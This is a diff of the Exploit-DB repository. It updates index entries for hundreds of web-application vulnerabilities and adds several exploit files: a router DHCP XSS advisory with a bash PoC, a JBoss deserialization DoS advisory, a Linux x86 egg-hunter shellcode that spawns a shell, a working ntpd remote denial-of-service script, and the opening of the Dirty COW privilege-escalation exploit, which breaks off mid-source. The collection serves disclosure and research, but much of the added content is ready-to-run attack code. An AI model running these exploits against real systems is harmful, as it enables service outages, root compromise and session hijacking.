28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0
28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0
28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
@ -29619,10 +29632,10 @@ id,file,description,date,author,platform,type,port
28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
@ -29934,7 +29947,7 @@ id,file,description,date,author,platform,type,port
28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0
28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0
28838,platforms/php/webapps/28838.txt,"ClanLite - Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0
28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0
@ -30785,7 +30798,7 @@ id,file,description,date,author,platform,type,port
29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0
29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0
29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0
@ -32079,8 +32092,8 @@ id,file,description,date,author,platform,type,port
32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@ -32177,7 +32190,7 @@ id,file,description,date,author,platform,type,port
32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0
32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0
32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0
32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -33218,9 +33231,9 @@ id,file,description,date,author,platform,type,port
34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80
34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0
34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0
34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
34213,platforms/php/webapps/34213.txt,"PHP Bible Search - bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0
34214,platforms/php/webapps/34214.txt,"PHP Bible Search - bible.php chapter Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0
34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0
@ -34117,7 +34130,7 @@ id,file,description,date,author,platform,type,port
35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0
35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0
35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0
35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0
35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0
@ -34447,7 +34460,7 @@ id,file,description,date,author,platform,type,port
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80
36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36159,platforms/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
36161,platforms/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80
36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0
@ -36199,7 +36212,7 @@ id,file,description,date,author,platform,type,port
39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
@ -36817,3 +36830,5 @@ id,file,description,date,author,platform,type,port
40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080

Can't render this file because it is too large.

345
platforms/android/remote/40846.html Executable file
View file

File diff suppressed because one or more lines are too long

157
platforms/hardware/webapps/40837.txt Executable file
View file

@ -0,0 +1,157 @@
Document Title:
===============
Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1990
Release Date:
=============
2016-11-28
Vulnerability Laboratory ID (VL-ID):
====================================
1990
Common Vulnerability Scoring System:
====================================
3.5
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application.
Vulnerability Disclosure Timeline:
==================================
2016-11-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
The vulnerability allows remote attackers and local privileged account to inject malicious script codes
on the application-side to manipulate the router dhcp hostnames.
Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying
the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side
on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the
web gui are affected by the security vulnerability. Remote attackers can for example make special crafted
malicious pages with POST method requests to manipulate the dhcp hostname listing and client view.
The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect
to malicious sources and persistent manipulation of affected or connected web module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] DHCP Client List
[+] DHCP settings
Vulnerable Parameter(s):
[+] Hostnames
Proof of Concept (PoC):
=======================
Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manaul steps to reproduce the vulnerability ... (local)
1. Open the Router UI
2. Login as basic account
3. Open the DHCP List module via settings
4. Inject a payload to the hostnames input field
5. Save the input
6. Now the list becomes visible with all clients and the payload executes within the context
7. Successful reproduce of the vulnerability!
The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload.
Save the file into vulnerablity.sh, then chmod +x vulnerability.sh.
PoC: Exploit
#!/bin/bash
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
echo $GREEN"[+] Vulnerability founded by : Lawrence Amer "
echo -n $BLUE"[~] type XSS Payload here :"
read -e xss
echo $xss > /etc/hostname
echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"
Video: https://www.youtube.com/watch?v=HUM5myJWbvc
Solution - Fix & Patch:
=======================
The xss vulnerability can be patched by a secure parse of the hostnames client parameters.
Restrict the input and disallow the usage of special chars to prevent the injection point.
Parse as well the hostnames output location in the active dhcp clients list.
Security Risk:
==============
The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

77
platforms/java/webapps/40842.txt Executable file
View file

@ -0,0 +1,77 @@
Security Advisory @ Mediaservice.net Srl
(#05, 23/11/2016) Data Security Division
Title: Red Hat JBoss EAP deserialization of untrusted data
Application: JBoss EAP 5.2.X and prior versions
Description: The application server deserializes untrusted data via the
JMX Invoker Servlet. This can lead to a DoS via resource
exhaustion and potentially remote code execution.
Author: Federico Dotta <federico.dotta@mediaservice.net>
Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Will not fix
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CVE-2016-7065 to this issue.
References: http://lab.mediaservice.net/advisory/2016-05-jboss.txt
http://lab.mediaservice.net/code/jboss_payload.zip
https://bugzilla.redhat.com/show_bug.cgi?id=1382534
1. Abstract.
JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The
communication employs serialized Java objects, encapsulated in HTTP
requests and responses.
The server deserializes these objects without checking the object type. This
behavior can be exploited to cause a denial of service and potentially
execute arbitrary code.
The objects that can cause the DoS are based on known disclosed payloads
taken from:
- https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
Currently there is no known chain that allows code execution on JBoss EAP,
however new chains are discovered every day.
2. Example Attack Session.
Submit an authenticated POST request to the JMX Invoker Servlet URL (for
example: http://localhost:8080/invoker/JMXInvokerServlet) with one of the
following objects in the body of the request:
* 01_BigString_limited.ser: it's a string object; the server will
reply in a normal way (object size similar to the next one).
* 02_SerialDOS_limited.ser: the application server will require
about 2 minutes to execute the request with 100% CPU usage.
* 03_BigString.ser: it's a string object; the server will
reply in a normal way (object size similar to the next one).
* 04_SerialDOS.ser: the application server will require an
unknown amount of time to execute the request with 100% CPU usage.
3. Affected Platforms.
This vulnerability affects versions 4 and 5 of JBoss EAP.
4. Fix.
Red Hat will not fix the issue because JBoss EAP 4 is out of maintenance
support and JBoss EAP 5 is close to the end of its maintenance period.
5. Proof Of Concept.
See jboss_payload.zip (40842.zip) and Example Attack Session above.
http://lab.mediaservice.net/code/jboss_payload.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip
6. Timeline
06/10/2016 - First communication sent to Red Hat Security Response Team
07/10/2016 - Red Hat Security Response Team response, Bug 1382534
23/11/2016 - Security Advisory released
Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip

61
platforms/lin_x86/shellcode/40827.c
View file

@ -1,45 +1,60 @@
/*
;author: Filippo "zinzloun" Bersani
;date: 25/11/2016
;version 1.0
;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark
;author: Filippo "zinzloun" Bersani
;date: 28/11/2016
;version: 1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
; Linux bb32 4.4.0-45-generic 32bit
; description
; egg hunter shellcode: different approach to the classic jpc technique using fstenv and dynamic memory location
; plus a bit of obfuscation to generate the egg mark
; POC
; execute a shell
; see comment for details
global _start
section .text
_start:
fldz ;with this 2 instructions...
fnstenv [esp-0xc] ;set the entry point of my egg (_start)
fldpi
fstenv [esp-0xc] ;fstenv getpc: the entry mem addr of this code (_start)
pop esi ;pop it in esi
xor eax,eax
mov al, 0x1f ;set the offset bytes to point at the end of the program
add esi, eax ;set the mem addr dinamically
pop esi ;get the entry point addr...
lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter
mov edx, dword 0x65676760 ;a dumm value..
rol edx, 0x4 ;...to get the real egg mark: 56767606
set_mark:
mov edx, dword 0x65676760 ;a dumm value..
rol edx, 0x4 ;get the real mark: 56767606
find_egg:
inc esi ;scan the next section of memory after this code
cmp [esi], edx ;check if we have found the egg...
jz find_egg ;loop
call esi ;egg found (zero flag is set), jump to the address to exec the shell code
*/
add esi,4 ;scan the next section of mem, since we are in 32 arch we need to add 4 bytes
cmp[esi], edx ;check if we have found the egg...
jz find_egg ;loop
call esi ;found our egg (zero flag is set), jump to the execution of the shellcode
*/
#include<stdio.h>
#include<string.h>
unsigned char egg_hunter[] = \
"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6";
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x5e\x31\xc0\xb0\x1f\x01\xc6\xba\x60\x67\x67\x65\xc1\xc2\x04\x83\xc6\x04\x39\x16\x74\xf9\xff\xd6"; //the actual egg hunter code
unsigned char shell_code[] = \
"\x31\xc0\xb0\x05\xfe\xc0\xfe\xc8\xb0\x06\x90" //dumm instructions
"\x06\x76\x76\x56" // egg id reversed
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // /bin/bash
main()
{
printf("Egg hunter length: %d\n", strlen(egg_hunter));
printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
int (*ret)() = (int(*)())egg_hunter;
ret();
}
}

26
platforms/linux/dos/40840.py Executable file
View file

@ -0,0 +1,26 @@
#!/usr/bin/env python
# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855
import sys
import socket
if len(sys.argv) != 3:
print "usage: " + sys.argv[0] + " <host> <port>"
sys.exit(-1)
payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"

72
platforms/linux/local/40838.c Executable file
View file

@ -0,0 +1,72 @@
// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball
#include <fcntl.h> //// pikachu
#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball
#include <string.h> //// pokeball
#include <stdio.h> //// (___)
#include <stdint.h> //// (o o)_____/
#include <sys/mman.h> //// @@ ` \
#include <sys/types.h> //// \ ____, /miltank
#include <sys/stat.h> //// // //
#include <sys/wait.h> //// ^^ ^^
#include <sys/ptrace.h> //// mmap bc757000
#include <unistd.h> //// madvise 0
////////////////////////////////////////////// ptrace 0
////////////////////////////////////////////// miltank
//////////////////////////////////////////////
int f ;// file descriptor
void *map ;// memory map
pid_t pid ;// process id
pthread_t pth ;// thread
struct stat st ;// file info
//////////////////////////////////////////////
void *madviseThread(void *arg) {// madvise thread
int i,c=0 ;// counters
for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8
c+=madvise(map,100,MADV_DONTNEED) ;// race condition
printf("madvise %d\n\n",c) ;// sum of errors
}// /madvise thread
//////////////////////////////////////////////
int main(int argc,char *argv[]) {// entrypoint
if(argc<3)return 1 ;// ./d file contents
printf("%s \n\
(___) \n\
(o o)_____/ \n\
@@ ` \\ \n\
\\ ____, /%s \n\
// // \n\
^^ ^^ \n\
", argv[1], argv[2]) ;// dirty cow
f=open(argv[1],O_RDONLY) ;// open read only file
fstat(f,&st) ;// stat the fd
map=mmap(NULL ,// mmap the file
st.st_size+sizeof(long) ,// size is filesize plus padding
PROT_READ ,// read-only
MAP_PRIVATE ,// private mapping for cow
f ,// file descriptor
